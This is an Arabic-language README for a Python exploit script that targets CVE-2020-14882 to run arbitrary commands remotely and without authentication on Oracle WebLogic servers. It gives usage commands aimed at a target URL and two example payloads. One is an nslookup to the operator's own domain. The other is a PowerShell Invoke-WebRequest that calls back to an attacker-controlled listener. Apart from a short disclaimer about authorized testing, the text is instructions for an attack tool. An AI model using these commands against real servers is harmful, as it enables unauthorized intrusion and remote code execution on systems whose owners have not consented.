
يسمح هذا السكربت بتنفيذ الأوامر عن بُعد (RCE) على Oracle WebLogic Server
يتيح هذا النص البرمجي تنفيذ الأوامر عن بُعد (RCE) على Oracle WebLogic Server باستخدام طلب GET غير موثوق. يستغل الثغرة الأمنية CVE-2020-14882. من خلال تنفيذ أوامر عشوائية، يمكن للمهاجم الوصول غير المصرح به إلى الخادم.
تأكد من أن لديك Python 3 مثبتًا. لاستخدام هذا النص البرمجي، اتبع الخطوات أدناه:
افتح محطة أو موجه أوامر.
قم بتشغيل النص البرمجي باستخدام الأمر التالي:
python3 exploit.py http(s)://target:7001 command
استبدل http(s)://target:7001 بعنوان URL الهدف لخادم Oracle WebLogic، وcommand بالأمر المطلوب تنفيذه.
المثال 1:
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
هذا المثال ينفذ الأمر nslookup your_Domain على الخادم الهدف.
المثال 2:
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
هذا المثال ينفذ أمر PowerShell Invoke-WebRequest -Uri http://your_listener على الخادم الهدف.
هذا النص البرمجي مخصص فقط لاختبار الاختراق المصرح به وأغراض البحث الأمني. الاستخدام غير المصرح به لهذا النص البرمجي لاستغلال الأنظمة دون موافقة مناسبة غير قانوني وقد يؤدي إلى عواقب قانونية. استخدمه على مسؤوليتك الخاصة.
يتطلب هذا النص البرمجي التبعيات التالية:
requestsurllib3يرجى التأكد من تثبيت هذه التبعيات قبل تشغيل النص البرمجي.